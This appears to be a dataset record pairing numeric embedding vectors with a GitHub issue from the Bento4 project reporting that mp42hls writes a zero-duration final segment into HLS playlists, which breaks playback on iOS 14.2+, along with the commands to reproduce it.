-0.015468449331820011, -0.0011896636569872499, -0.0006822932627983391, 0.003756139660254121, -0.009223890490829945, -0.01757504604756832, 0.010043959133327007, -0.001803774619475007, -0.009976246394217014, -0.007847078144550323, -0.0034815294202417135, -0.0007260239799506962, -0.011992561630904675, -0.009690350852906704, -0.008870283141732216, -0.013587557710707188, 0.008208208717405796, 0.023473521694540977, 0.00463827745988965, -0.015265312977135181, -0.005499725695699453, 0.0029849743004888296, 0.019817069172859192, -0.0029285475611686707, 0.007064627017825842, 0.019049664959311485, -0.004367429297417402, -0.0038163282442837954, 0.012082844972610474, -0.00040251071914099157, -0.01412173081189394, -0.010954310186207294, -0.0003968680393882096, -0.005360540002584457, 0.012489117681980133, -0.0058646188117563725, -0.018628345802426338, -0.01239131111651659, 0.009720445610582829, -0.023759417235851288, 0.003835137002170086, 0.01953117363154888, -0.006714781280606985, -0.040085554122924805, 0.015317977406084538, -0.022164421156048775, 0.0013213260099291801, 0.003712879028171301, -0.018583204597234726, -0.00973549298942089, 0.027009597048163414, 0.009991293773055077, 0.011443342082202435, -0.00071661954279989, 0.00690287072211504, 0.02600143849849701, 0.021065980195999146, -0.03683537244796753, -0.004183101933449507, -0.018116744235157967, 0.018583204597234726, -0.015423307195305824, 0.014934276230633259, 0.009464643895626068, -0.016566889360547066, -0.004326049704104662, -0.002810051431879401, -0.01677754893898964, -0.012346169911324978, -0.013707934878766537, -0.005744241643697023, -0.018372545018792152, 0.0011971872299909592, 0.006549262907356024, -0.017650282010436058, -0.013106049969792366, -0.0060150898061692715, 0.00013589438458438963, 0.02103588730096817, -0.006199417170137167, 0.005116024054586887, 0.002879644278436899, 0.002050171373412013, 0.00919379573315382, -0.00960006844252348, -0.007316666655242443, 0.010209477506577969, -0.002979331649839878, -0.033856041729450226, 0.007929837331175804, -0.0009780634427443147, -0.024180736392736435, 0.017559999600052834, 0.008667146787047386, 0.004694704432040453, 0.02022334188222885, 0.011285346932709217, 0.02512870542705059, -0.013000719249248505, -0.024015218019485474, -0.0016175664495676756, -0.01895938254892826, 0.0067373523488640785, 0.007248954381793737, -0.036624711006879807, -0.01947098597884178, 0.006440171506255865, 0.002251426689326763, -0.01109725795686245, 0.04526176303625107, 0.023729322478175163, 0.0010260260896757245, 0.00031881104223430157, 0.01793617755174637, 0.000896244659088552, -0.0067636845633387566, 0.009238936938345432, 0.013775646686553955, -0.013745552860200405, 0.0004518840869423002, -0.005793144926428795, 0.004190625622868538, -0.0055222962982952595, -0.0035022194497287273, 0.005217592231929302, 0.005078406073153019, -0.01700325682759285, 0.0086220046505332, 0.0074784234166145325, 0.012240839190781116, 0.0038746357895433903, -0.027310539036989212, 0.0028288601897656918, 0.011571242474019527, -0.049083735793828964, 0.026031533256173134, 0.013279091566801071, 0.021743101999163628, -0.02150234766304493, 0.007301619276404381, -0.011608860455453396, 0.0005755526944994926, 0.006568071898072958, -0.0025279177352786064, 0.0026633418165147305, -0.006327318027615547, 0.01665717177093029, 0.025550024583935738, -0.00584957143291831, 0.01999763399362564, -0.008764952421188354, 0.018086649477481842, -0.01262454129755497, 0.010262141935527325, 0.0028533118311315775, 0.009562450461089611, -0.006282176356762648, 0.01578443869948387, -0.008554292842745781, -0.006963058840483427, 0.00411915173754096, 0.0015000107232481241, -0.006989391520619392, 0.015453401952981949, -0.014219537377357483, 0.0219537615776062, 0.018146837130188942, 0.002667103661224246, -0.01086402777582407, -0.010826409794390202, 0.009231413714587688, -0.0006578416796401143, 0.0032407755497843027, 0.0025147513952106237, -0.030936898663640022, 0.00436366768553853, 0.014392578974366188, 0.0203437190502882, -0.009795681573450565, 0.0003460839798208326, 0.0010391923133283854, -0.016672220081090927, -0.020298577845096588, -0.01296310219913721, -0.007877171970903873, -0.020825227722525597, -0.022465363144874573, -0.0086220046505332, 0.004777463618665934, 0.010510419495403767, 0.0016862188931554556, -0.007516040932387114, -0.0006639545899815857, -0.0035624078009277582, 0.010367471724748611, 0.012000085785984993, 0.00965273380279541, -0.010743650607764721, -0.02132178284227848, -0.0008022000547498465, 0.008614481426775455, -0.0004076831683050841, 0.005905998405069113, 0.011443342082202435, 0.000761760922614485, -0.012782536447048187, -0.004529186058789492, -0.00345143536105752, -0.00022923361393623054, -0.018342450261116028, 0.001232924172654748, 0.01682269014418125, 0.030997086316347122, 0.023323049768805504, 0.03809932991862297, 0.018282262608408928, -0.014979417435824871, 0.0011887232540175319, -0.01133048813790083, -0.0007217919919639826, -0.008321062661707401, -0.01133048813790083, 0.0033649143297225237, -0.006707258056849241, -0.0012404477456584573, -0.014294772408902645, 0.004258337430655956, 0.008599434047937393, 0.006410077214241028, -0.033464815467596054, 0.005638911854475737, -0.004845175426453352, 0.003729807212948799, 0.016220806166529655, 0.000028874617783003487, 0.003092185128480196, -0.0016185068525373936, 0.014904181472957134, -0.013053384609520435, 0.008396297693252563, -0.013271568343043327, -0.040025364607572556, -0.010803839191794395, -0.021351875737309456, -0.012368740513920784, 0.0072602396830916405, 0.005187497939914465, 0.024602055549621582, 0.003338581882417202, -0.015694156289100647, -0.0008130152127705514, -0.0038069237489253283, 0.0008910722099244595, -0.0204039067029953, -0.012097892351448536, -0.007181242574006319, -0.020102964714169502, -0.001088095479644835, -0.00003576631934265606, 0.01567910797894001, -0.007779365871101618, 0.01045775506645441, 0.014520479366183281, 0.005699099972844124, -0.008975612930953503, 0.00022335581888910383, 0.007990025915205479, 0.02270611748099327, 0.006041422486305237, -0.0025015852879732847, 0.0024827762972563505, 0.02115626446902752, 0.013956212438642979, 0.009156177751719952, -0.01989230513572693, -0.03626358136534691, -0.006180608179420233, 0.023533709347248077, -0.0030884232837706804, 0.025173846632242203, 0.00043142942013219, 0.010179382748901844, -0.017544953152537346, 0.016100428998470306, -0.0027084832545369864, 0.018191980198025703, -0.010390042327344418, 0.00597747229039669, -0.01322642620652914, -0.0145280035212636, -0.004416332580149174, -0.01953117363154888, 0.006970582529902458, -0.006601927801966667, -0.0168828796595335, -0.004784987308084965, 0.013963735662400723, 0.021637771278619766, -0.009961199946701527, -0.02938704378902912, 0.010803839191794395, 0.01133048813790083, -0.0038934447802603245, 0.016928020864725113, 0.03229114040732384, -0.005905998405069113, 0.0016307326732203364, 0.0032445371616631746, -0.01409163698554039, 0.028198320418596268, 0.003496576566249132, 0.007794412784278393, -0.011390676721930504, 0.009419502690434456, -0.004875269718468189, 0.021758148446679115, -0.012857772409915924, -0.011082210578024387, -0.0047812252305448055, 0.012586923316121101, 0.026257241144776344, 0.016115475445985794, 0.0013307305052876472, 0.026753796264529228, 0.010781267657876015, -0.040958285331726074, -0.03003407083451748, 0.002509108744561672, 0.0077643184922635555, -0.031087368726730347, 0.029537513852119446, 0.016175663098692894, -0.008531722240149975, 0.001837630639784038, 0.020659709349274635, -0.005228877533227205, 0.007658988703042269, -0.0027404583524912596, -0.003235132899135351, -0.005304113030433655, 0.012767489068210125, -0.0034984576050192118, 0.0036489288322627544, -0.008275921456515789, -0.010307283140718937, -0.010013864375650883, 0.0028834061231464148, 0.0005374646279960871, -0.012015133164823055, -0.027701765298843384, 0.006759922951459885, 0.0005322921788319945, -0.003799400059506297, -0.002294687321409583, -0.004010059870779514, -0.012526734732091427, 0.012632065452635288, 0.01084145624190569, -0.0056426734663546085, -0.003767424961552024, 0.0025203940458595753, -0.0045103770680725574, 0.010833933018147945, -0.022405175492167473, 0.018658440560102463, 0.026934361085295677, 0.011315440759062767, 0.006180608179420233, -0.021592630073428154, -0.006022613495588303, -0.011661524884402752, -0.01885405369102955, -0.0026971979532390833, 0.003539837198331952, 0.005868380423635244, -0.006722304970026016, 0.003331058192998171, -0.011684095486998558, -0.01751485839486122, 0.010307283140718937, 0.008682193234562874, 0.002734815701842308, 0.0035586459562182426, 0.002273997524753213, 0.01596500352025032, -0.00826839730143547, 0.01184961386024952, 0.033103685826063156, 0.004183101933449507, -0.002345471177250147, 0.009178749285638332, -0.005789382848888636, 0.0255951676517725, -0.00963016226887703, 0.0016890402184799314, -0.015528636984527111, 0.0008863699622452259, -0.016235852614045143, 0.020704850554466248, 0.002061456674709916, -0.004318526014685631, -0.003968680277466774, 0.025504883378744125, 0.02097569778561592, -0.005480916704982519, 0.010059005580842495, -0.007794412784278393, 0.009848346002399921, 0.0030696142930537462, -0.002042647683992982, 0.01025461871176958, -0.029206477105617523, 0.03665480762720108, 0.0021009554620832205, -0.013391944579780102, -0.01161638367921114, 0.009901011362671852, 0.008336110040545464, -0.013369373977184296, 0.001413489691913128, 0.010412613861262798, 0.019124900922179222, -0.016687266528606415, 0.010796315036714077, -0.0022006426006555557, 0.009171225130558014, -0.00823830347508192, 0.020539332181215286, 0.020148105919361115, -0.005947377998381853, 0.00844143982976675, 0.01525026559829712, -0.019666597247123718, 0.005179974250495434, -0.019004523754119873, 0.01993744634091854, 0.0060263751074671745, -0.016973162069916725, 0.0016561247175559402, -0.006959297228604555, -0.017650282010436058, -0.006056469399482012, 0.008306015282869339, -0.002285282826051116, 0.0008290027617476881, 0.004709751345217228, -0.012647111900150776, 0.0256553553044796, -0.014625810086727142, 0.005236400756984949, -0.0009569033863954246, -0.019756881520152092, -0.007587514817714691, 0.0044012852013111115, 0.006635784171521664, 0.02166786603629589, -0.0010664652800187469, 0.046375252306461334, 0.0019213303457945585, 0.007579991593956947, -0.013000719249248505, -0.003293440444394946, 0.011082210578024387, 0.011766854673624039, 0.005827000830322504, -0.010412613861262798, 0.006218226160854101, -0.008900376968085766, 0.016642125323414803, -0.011774378828704357, 0.012601970694959164, -0.00968282762914896, -0.009216366335749626, 0.004563041962683201, -0.007358046248555183, -0.03487924486398697, -0.012030179612338543, -0.009329220280051231, 0.022585740312933922, 0.024240925908088684, 0.0001588177401572466, 0.007113530300557613, 0.009743016213178635, -0.0058646188117563725, 0.0005163046298548579, 0.0019072236027568579, -0.03129803016781807, 0.03551122546195984, -0.009411979466676712, -0.01683773845434189, -0.0004979659570381045, -0.0037523778155446053, 0.01040508970618248, -0.009419502690434456, 0.024511773139238358, -0.004976837895810604, -0.022691071033477783, 0.005010694265365601, -0.0025279177352786064, 0.007771842181682587, -0.02270611748099327, -0.01965155079960823, -0.0034345071762800217, -0.018026459962129593, 0.018538063392043114, 0.01620575785636902, 0.022676024585962296, 0.0034025320783257484, 0.015633966773748398, 0.02502337656915188, 0.007523564621806145, 0.006537977606058121, 0.004066486842930317, -0.009901011362671852, -0.019802022725343704, -0.005669006146490574, 0.005401919595897198, 0.0203437190502882, 0.001871486660093069, -0.026934361085295677, -0.017605140805244446, -0.025324318557977676, 0.004653324838727713, -0.005969948600977659, -0.008464010432362556, 0.0005040788091719151, 0.023533709347248077, 0.01254178211092949, -0.0011746165109798312, -0.011774378828704357, 0.00459689786657691, 0.017770659178495407, -0.0272653978317976, -0.005285304039716721, -0.01659698411822319, -0.0033084875904023647, 0.009825775399804115, 0.007997549138963223, -0.0029285475611686707, 0.026813983917236328, -0.009554927237331867, 0.015814533457159996, -0.002005029935389757, -0.01728915236890316, 0.0007152088801376522, 0.0019213303457945585, 0.0024263495579361916, 0.016702312976121902, -0.001366467447951436, -0.008516674861311913, -0.02305220253765583, -0.0009625460370443761, -0.012534258887171745, -0.00403639255091548, 0.020855320617556572, 0.008892853744328022, -0.006090325769037008, 0.010262141935527325, 0.01221826858818531, -0.021577583625912666, 0.003261465346440673, 0.008193162269890308, -0.022179467603564262, -0.002913500415161252, -0.01885405369102955, -0.000616462086327374, 0.012466546148061752, 0.010059005580842495, -0.002443277509883046, -0.021938715130090714, -0.016461558640003204, 0.004168055020272732, 0.005315398331731558, 0.0045216623693704605, -0.009743016213178635, -0.023127438500523567, 0.03343472257256508, -0.012722347863018513, -0.01464085653424263, -0.032140668481588364, -0.0011294751893728971, 0.0027743144892156124, 0.021065980195999146, 0.026603324338793755, 0.039573948830366135, -0.001894057379104197, -0.000762231124099344, -0.01891424134373665, 0.01953117363154888, 0.003641405375674367, 0.0036959510762244463, 0.02779204770922661, -0.008832665160298347, 0.0013702291762456298, 0.009931105189025402, 0.0028740016277879477, 0.02472243271768093, 0.0005948318284936249, 0.011533624492585659, -0.010224523954093456, 0.0032332518603652716, -0.03220085799694061, -0.004830128513276577, 0.0253544133156538, -0.013700410723686218, -0.017484763637185097, -0.027867283672094345, 0.013422039337456226, 0.015468449331820011, 0.013008243404328823, -0.012662159278988838, -0.002354875672608614, 0.0443890318274498, 0.013557463884353638, 0.019847163930535316, 0.012075320817530155, 0.02282649464905262, 0.0013185046846047044, 0.004860222805291414, -0.003720402717590332, -0.01584462635219097, 0.014129254035651684, -0.00844143982976675, 0.022585740312933922, -0.012203222140669823, 0.0026595802046358585, 0.005006932187825441, -0.024797668680548668, -0.002960522659122944, -0.0023247813805937767, -0.003551122499629855, 0.015709202736616135, 0.012203222140669823, 0.012233315967023373, 0.013369373977184296, 0.019290419295430183, 0.008772476576268673, 0.014520479366183281, 0.011089733801782131, -0.03174944221973419, -0.0006531394319608808, -0.025384506210684776, -0.02254059910774231, 0.005661482457071543, -0.007448329124599695, -0.00019678824173752218, 0.02126159332692623, 0.0005369944265112281, -0.009615115821361542, 0.0035624078009277582, -0.028980771079659462, 0.0008431094465777278, -0.013354327529668808, 0.0336453802883625, -0.006835158448666334, 0.05419975891709328, 0.015980051830410957, 0.020358765497803688, -0.024255972355604172, 0.017830848693847656, -0.0014774400042369962 ]
2,315
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
Hi! When creating hls playlist from video, duration of last segment in variant playlist calculated incorrectly. When last segment is one sample only, this cause to create playlists with zero duration chunks `#EXTINF:0.000000,` which cause `-16240` error on ios 14.2+ devices while trying download content. Here command to reproduce issue: ```(sh) wget https://storage.yandexcloud.net/github-public/video_sdr_avc_1280x534_2400_4000_720p.mp4 mp42hls --hls-version 7 --segment-duration 4 --verbose --segment-filename-template %d.ts --segment-url-template %d.ts --index-filename video_sdr_avc_720p.m3u8 --iframe-index-filename video_sdr_avc_720-iframes.m3u8 video_sdr_avc_1280x534_2400_4000_720p.mp4 ``` Result playlist contains zero duration segment: ```(sh) tail video_sdr_avc_720p.m3u8 57.ts #EXTINF:4.000000, 58.ts #EXTINF:4.000000, 59.ts #EXTINF:4.000000, 60.ts #EXTINF:0.000000, 61.ts #EXT-X-ENDLIST ```
Incorrect last segment duration calculation in mp42hls
https://api.github.com/repos/axiomatic-systems/Bento4/issues/575/comments
1
2021-01-24T12:19:41
2021-02-09T11:21:46Z
https://github.com/axiomatic-systems/Bento4/issues/575
792,783,933
575
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Incorrect last segment duration calculation in mp42hls Issue date: --- start body --- Hi! When creating hls playlist from video, duration of last segment in variant playlist calculated incorrectly. When last segment is one sample only, this cause to create playlists with zero duration chunks `#EXTINF:0.000000,` which cause `-16240` error on ios 14.2+ devices while trying download content. Here command to reproduce issue: ```(sh) wget https://storage.yandexcloud.net/github-public/video_sdr_avc_1280x534_2400_4000_720p.mp4 mp42hls --hls-version 7 --segment-duration 4 --verbose --segment-filename-template %d.ts --segment-url-template %d.ts --index-filename video_sdr_avc_720p.m3u8 --iframe-index-filename video_sdr_avc_720-iframes.m3u8 video_sdr_avc_1280x534_2400_4000_720p.mp4 ``` Result playlist contains zero duration segment: ```(sh) tail video_sdr_avc_720p.m3u8 57.ts #EXTINF:4.000000, 58.ts #EXTINF:4.000000, 59.ts #EXTINF:4.000000, 60.ts #EXTINF:0.000000, 61.ts #EXT-X-ENDLIST ``` --- end body ---
1,105
[ 0.006191983353346586, -0.01740572229027748, -0.020692965015769005, 0.015383386053144932, 0.007532632909715176, -0.010823662392795086, -0.018981175497174263, 0.08343839645385742, -0.010838811285793781, 0.02354089915752411, 0.019723456352949142, 0.008407463319599628, -0.003383814822882414, 0.011346288956701756, 0.02494971640408039, -0.0030240360647439957, -0.007434167433530092, -0.004408237524330616, -0.01814800314605236, 0.02040514163672924, 0.024434665217995644, -0.011187228374183178, -0.017148196697235107, 0.046051692217588425, -0.024495258927345276, 0.020177913829684258, -0.031054595485329628, 0.016118092462420464, -0.019723456352949142, -0.0023290948010981083, 0.010301036760210991, 0.02387416735291481, 0.0045104906894266605, 0.023783275857567787, 0.04650615155696869, 0.036114223301410675, 0.06068522483110428, 0.04902081564068794, -0.025737443938851357, 0.011020594276487827, -0.04505188763141632, -0.0065669110044837, -0.019208403304219246, 0.01383823063224554, -0.01126297190785408, 0.01335347630083561, -0.023934761062264442, -0.0033573047257959843, -0.04550634324550629, -0.034599363803863525, 0.008021174930036068, 0.003766316454857588, -0.03381163626909256, -0.0052565583027899265, -0.016708888113498688, -0.05356539040803909, 0.06847159564495087, 0.022647131234407425, -0.014542640186846256, 0.03829561918973923, -0.005093710962682962, 0.010997871868312359, -0.007100898306816816, 0.049081411212682724, 0.029948748648166656, 0.008960386738181114, -0.030433503910899162, 0.035477980971336365, -0.034266095608472824, 0.012755107134580612, 0.002715383656322956, -0.028706565499305725, 0.030766772106289864, 0.014095757156610489, 0.0034974291920661926, -0.05889769271016121, 0.028191514313220978, 0.029888154938817024, 0.012997484765946865, 0.013474664650857449, -0.05920066311955452, 0.008127215318381786, -0.06447236984968185, 0.02791883982717991, 0.02026880532503128, 0.019950684159994125, -0.05492876470088959, -0.05974601209163666, -0.04450653865933418, -0.027721907943487167, 0.003654595697298646, -0.0012213545851409435, 0.00015089409134816378, 0.002094291616231203, -0.027494678273797035, 0.015527297742664814, -0.016118092462420464, 0.00019349947979208082, -0.051171913743019104, -0.068047434091568, -0.010558562353253365, 0.011944658122956753, 0.004127989057451487, -0.0043135592713952065, 0.03662927448749542, -0.008369592018425465, 0.023192480206489563, -0.035508278757333755, 0.02276832051575184, 0.07513697445392609, 0.015603041276335716, 0.027858244255185127, -0.012686938978731632, -0.03923483192920685, -0.0023347754031419754, 0.007646247278898954, 0.006843372713774443, -0.043294649571180344, 0.003450089832767844, 0.018026813864707947, -0.008627118542790413, 0.014163925312459469, -0.01123267412185669, 0.030660733580589294, -0.005120221059769392, 0.05114161595702171, -0.03269064426422119, 0.0018396060913801193, 0.016102943569421768, -0.027767352759838104, -0.02475278452038765, -0.015603041276335716, -0.0222229715436697, -0.031569648534059525, 0.013906399719417095, 0.008195383474230766, -0.03070617839694023, 0.028933793306350708, 0.0013993503525853157, -0.005586040206253529, -0.0127096613869071, -0.031206082552671432, 0.06301810592412949, 0.009248210117220879, -0.03508411720395088, -0.022616835311055183, -0.005358811467885971, -0.003571278415620327, -0.02073840983211994, 0.01649680733680725, -0.007574291899800301, -0.0054572769440710545, 0.0019058811012655497, 0.015080414712429047, 0.03814413398504257, 0.02431347593665123, -0.015353089198470116, -0.028191514313220978, -0.0006622771034017205, -0.012285500764846802, 0.015087989158928394, -0.0012696406338363886, 0.01064187940210104, -0.013156544417142868, -0.013224713504314423, -0.019011471420526505, -0.0002535020757932216, 0.019041769206523895, -0.010490394197404385, 0.02064751833677292, -0.007297830190509558, 0.028797456994652748, -0.01922355219721794, 0.00821810681372881, -0.032751236110925674, -0.0363566018640995, 0.01264149323105812, 0.04974794760346413, -0.011308417655527592, -0.013361050747334957, -0.03923483192920685, 0.016708888113498688, -0.0119522325694561, -0.006335895042866468, 0.019072066992521286, -0.03847740218043327, 0.054777275770902634, -0.010710048489272594, 0.017996516078710556, -0.02700992487370968, 0.013792784884572029, 0.03814413398504257, 0.015603041276335716, -0.010619156993925571, 0.011300843209028244, -0.025373877957463264, -0.0027684036176651716, -0.03623541072010994, -0.011543220840394497, 0.012936890125274658, -0.0016369938384741545, 0.0060783689841628075, -0.015247048810124397, -0.027464382350444794, -0.019571969285607338, -0.02619190141558647, -0.012134015560150146, 0.04632436856627464, 0.008028749376535416, -0.020056724548339844, -0.03163024038076401, -0.013095950707793236, 0.0491723008453846, 0.054807573556900024, 0.009490587748587132, -0.0014220732264220715, -0.00660099508240819, 0.0498388409614563, -0.032811831682920456, 0.012247629463672638, 0.015262197703123093, -0.009899599477648735, 0.028236959129571915, -0.013603427447378635, -0.04387029632925987, 0.012588473036885262, 0.010157125070691109, -0.0001353904663119465, 0.019041769206523895, -0.007714415900409222, 0.022344160825014114, 0.008157512173056602, -0.06201830133795738, 0.02054147981107235, 0.005298216827213764, 0.01913266070187092, 0.014171499758958817, -0.010096530430018902, 0.015360663644969463, -0.034296393394470215, -0.012823276221752167, -0.004665763583034277, -0.008899793028831482, 0.008445335552096367, -0.011505348607897758, 0.004215093329548836, 0.008801327086985111, 0.01696641370654106, 0.004472619388252497, 0.015504575334489346, -0.005623911507427692, -0.03720492124557495, 0.02205633744597435, -0.0022192674223333597, -0.01858731172978878, 0.040689095854759216, 0.03444787859916687, 0.015254623256623745, -0.007733352016657591, -0.033114802092313766, 0.0105206910520792, 0.0024767934810370207, -0.03899245336651802, -0.02101108431816101, 0.013027781620621681, -0.020283952355384827, -0.019117511808872223, -0.017526911571621895, -0.011414457112550735, -0.020995937287807465, 0.0016246855957433581, -0.016012052074074745, -0.007252384442836046, 0.02451040782034397, -0.041598010808229446, -0.009801133535802364, 0.026055563241243362, 0.0017184173921123147, 0.03094855509698391, 0.022298714146018028, -0.015413683839142323, 0.025813186541199684, -0.010005638934671879, 0.06253334879875183, 0.00821810681372881, 0.0005500829429365695, 0.014383579604327679, -0.03047895058989525, -0.051505181938409805, 0.007286468520760536, 0.020920192822813988, 0.016724035143852234, 0.005237622652202845, 0.029979046434164047, -0.03841680660843849, 0.0021492051891982555, 0.002010974334552884, 0.04138593003153801, -0.0019039876060560346, 0.0005855874042026699, -0.023147035390138626, 0.007983303628861904, 0.02569199725985527, -0.027434084564447403, -0.025464769452810287, -0.004654402378946543, -0.0048816311173141, -0.020692965015769005, -0.01875394582748413, 0.01723908819258213, 0.025540512055158615, -0.020344547927379608, 0.02266228012740612, 0.019481077790260315, 0.009187615476548672, -0.001630366314202547, 0.01602720096707344, -0.007854540832340717, -0.006430573761463165, 0.005563317332416773, -0.01740572229027748, 0.006551762111485004, -0.06647198647260666, 0.03575065732002258, 0.00472257100045681, -0.027085667476058006, -0.013429218903183937, -0.02858537621796131, -0.0498388409614563, 0.015481851994991302, -0.005608763080090284, -0.010997871868312359, 0.015345514751970768, -0.007703054696321487, 0.034538768231868744, -0.0277825016528368, -0.022344160825014114, -0.04808160290122032, 0.002730532083660364, 0.0037814651150256395, -0.011005445383489132, 0.005317152943462133, 0.008558949455618858, 0.0022249482572078705, 0.003364879172295332, 0.005540594458580017, -0.020056724548339844, 0.007312978617846966, 0.00934667605906725, 0.040931470692157745, 0.0009652487933635712, 0.012315798550844193, 0.026888735592365265, -0.009649647399783134, -0.008869495242834091, -0.009657221846282482, -0.016360469162464142, -0.010164699517190456, 0.04056790471076965, 0.007653821725398302, 0.002359391888603568, -0.011058465577661991, 0.023616641759872437, 0.015557595528662205, 0.021601879969239235, -0.01155079435557127, -0.006926689762622118, -0.0075364201329648495, -0.017133047804236412, -0.035477980971336365, -0.021208016201853752, 0.007710629142820835, -0.016708888113498688, 0.020011277869343758, -0.04447624087333679, 0.01345194224268198, 0.03284212946891785, 0.0035485555417835712, -0.03890156373381615, 0.01982949487864971, -0.042506925761699677, 0.06435117870569229, 0.029206467792391777, -0.03859858959913254, 0.04323405772447586, 0.018844837322831154, -0.02013246715068817, 0.005881437566131353, -0.00478316517546773, -0.05801907554268837, 0.01660284772515297, 0.018435826525092125, -0.02064751833677292, -0.06410880386829376, -0.005597401410341263, 0.051262807101011276, -0.03305421024560928, -0.007017581257969141, 0.0046771252527832985, -0.053959254175424576, 0.03447817638516426, 0.0017146302852779627, 0.027115963399410248, -0.011679558083415031, 0.011187228374183178, 0.05823115259408951, -0.002724851481616497, -0.013285307213664055, 0.006479806732386351, 0.005521658807992935, 0.010732770897448063, 0.02505575679242611, -0.024464963003993034, -0.02525268867611885, 0.01383823063224554, 0.018814541399478912, 0.003202031832188368, -0.0011105805169790983, -0.03559917211532593, 0.04711209237575531, -0.01676948182284832, -0.03141816332936287, -0.01935989037156105, 0.00474908109754324, 0.0222229715436697, -0.001413552206940949, -0.02505575679242611, 0.01342164445668459, 0.011285694316029549, 0.018344935029745102, -0.00981628242880106, -0.03296331688761711, 0.02316218428313732, -0.006688099354505539, 0.010816088877618313, 0.018799392506480217, 0.009240635670721531, -0.015156157314777374, -0.02057177573442459, -0.004093904513865709, -0.0380532406270504, 0.021526137366890907, 0.0031546924728900194, 0.023995356634259224, 0.026116156950592995, -0.025479916483163834, -0.06895635277032852, -0.037901755422353745, -0.0008890324970707297, -0.03293301910161972, 0.0175117626786232, 0.0498388409614563, 0.04874814301729202, 0.002813849365338683, -0.015413683839142323, -0.002075355965644121, 0.0245861504226923, -0.008445335552096367, 0.026964478194713593, 0.00941484421491623, -0.03205440193414688, -0.001779011799953878, 0.024571001529693604, 0.009323952719569206, 0.008528652600944042, -0.009119447320699692, 0.00041066863923333585, -0.03208469972014427, 0.007176641374826431, -0.002645321423187852, -0.03947720676660538, 0.004003013018518686, -0.0072637456469237804, 0.013876101933419704, -0.0022097995970398188, 0.02555566094815731, -0.024707339704036713, -0.03811383619904518, -0.013323179446160793, -0.06171532720327377, -0.019253849983215332, -0.010414650663733482, 0.017723841592669487, 0.024252882227301598, -0.014451748691499233, 0.011134209111332893, -0.04077998548746109, -0.001007380778901279, -0.03447817638516426, 0.023359116166830063, -0.010293462313711643, 0.009233061224222183, 0.004658189602196217, -0.0068963924422860146, 0.03094855509698391, 0.008498354814946651, 0.0073546371422708035, -0.006184409372508526, -0.011119060218334198, -0.01064187940210104, -0.03405401483178139, 0.0034197927452623844, 0.008112066425383091, -0.014254816807806492, -0.009520884603261948, -0.06422999501228333, -0.029145874083042145, 0.013762488029897213, -0.03814413398504257, -0.02444981411099434, -0.01949622668325901, -0.04114355146884918, -0.004718783777207136, -0.016360469162464142, 0.004930864088237286, 0.008801327086985111, -0.010808514431118965, -0.017011858522892, 0.04347643256187439, 0.004540788009762764, -0.004506703466176987, -0.003383814822882414, -0.011876489035785198, 0.03375104442238808, -0.01723908819258213, 0.01693611592054367, 0.004252964630723, 0.0030543331522494555, 0.013156544417142868, 0.001458051148802042, -0.022904658690094948, -0.020329399034380913, 0.01778443716466427, 0.03229678049683571, -0.046627338975667953, -0.016587698832154274, -0.01748146489262581, 0.03141816332936287, 0.014004865661263466, 0.006282874848693609, -0.007892412133514881, 0.03947720676660538, -0.028433891013264656, 0.027191707864403725, -0.052686773240566254, 0.02723715268075466, -0.012989910319447517, 0.014156350865960121, -0.005082349758595228, -0.02461644820868969, 0.010838811285793781, -0.01982949487864971, -0.01916295848786831, 0.004321133252233267, -0.00616168649867177, 0.023116737604141235, 0.0003803714644163847, 0.024934567511081696, 0.027888542041182518, 0.02838844433426857, -0.005945818964391947, 0.011414457112550735, 0.030903110280632973, -0.021056530997157097, 0.011156931519508362, 0.0035220456775277853, -0.003037290880456567, 0.014830462634563446, -0.03481144458055496, 0.028024878352880478, -0.008990684524178505, -0.0059533934108912945, 0.022041188552975655, -0.028024878352880478, -0.0036867863964289427, 0.0230712927877903, 0.011217526160180569, 0.00014509502216242254, -0.022707726806402206, -0.021571582183241844, 0.03472055122256279, 0.002268500393256545, -0.006850946694612503, 0.0030391844920814037, -0.018163152039051056, -0.014148776419460773, -0.021601879969239235, -0.00897553563117981, -0.018769094720482826, -0.0022533517330884933, 0.00676005519926548, 0.02216237783432007, -0.006953199859708548, -0.010831236839294434, -0.0012478645658120513, 0.005627698730677366, -0.004472619388252497, -0.009778410196304321, 0.04505188763141632, 0.01367159653455019, -0.013868528418242931, 0.020602073520421982, -0.03781086578965187, -0.03499322757124901, -0.01770869456231594, 0.025267837569117546, 0.005597401410341263, 0.008914940990507603, -0.040022555738687515, 0.03711402788758278, 0.00601020036265254, 0.03587184473872185, 0.07234963774681091, -0.01229307521134615, -0.014777443371713161, 0.014656254090368748, 0.021253462880849838, -0.006074581760913134, 0.011709854938089848, 0.013633725233376026, 0.012815701775252819, -0.028479335829615593, 0.020344547927379608, -0.025298133492469788, -0.017526911571621895, 0.04974794760346413, 0.005498935934156179, -0.008839198388159275, -0.01064187940210104, -0.05747372657060623, -0.03384193405508995, 0.01013440266251564, -0.014489619992673397, -0.03596273809671402, -0.023813573643565178, 0.0074455286376178265, 0.019117511808872223, -0.024661893025040627, 0.00510128540918231, -0.015095563605427742, -0.02266228012740612, 0.008748306892812252, -0.01224005501717329, 0.017602654173970222, -0.02808547392487526, 0.004851333796977997, 0.007422805763781071, 0.034872040152549744, -0.001417339313775301, 0.031599946320056915, -0.012550601735711098, -0.017496613785624504, 0.018405528739094734, 0.025010311976075172, -0.00625636475160718, -0.014777443371713161, 0.021995743736624718, 0.03411461040377617, -0.004234028980135918, -0.0008336454629898071, -0.0277825016528368, -0.028782308101654053, 0.023283371701836586, -0.012679364532232285, 0.015936309471726418, -0.002084823790937662, -0.026388831436634064, -0.015739377588033676, -0.00660099508240819, 0.010816088877618313, -0.0052603455260396, -0.04081028327345848, 0.00892251543700695, 0.01795107126235962, -0.014868334867060184, 0.0030751624144613743, -0.013527684845030308, 0.006396489217877388, -0.010906980372965336, 0.0016057498287409544, -0.011399309150874615, -0.015443980693817139, 0.0008771976572461426, 0.017027007415890694, -0.0065328264608979225, -0.00794543232768774, 0.02320762909948826, -0.01605749875307083, 0.00892251543700695, -0.01770869456231594, 0.030024493113160133, 0.01690581813454628, 0.011762875132262707, 0.02579803764820099, 0.022450201213359833, -0.01292931567877531, 0.023359116166830063, 0.023222777992486954, -0.010210145264863968, -0.0237378291785717, -0.025207241997122765, -0.002287436043843627, 0.018844837322831154, -0.005733738653361797, 0.01966286078095436, 0.024055950343608856, -0.012588473036885262, -0.008422612212598324, 0.005434554070234299, 0.01596660725772381, -0.004487767815589905, 0.02841874212026596, 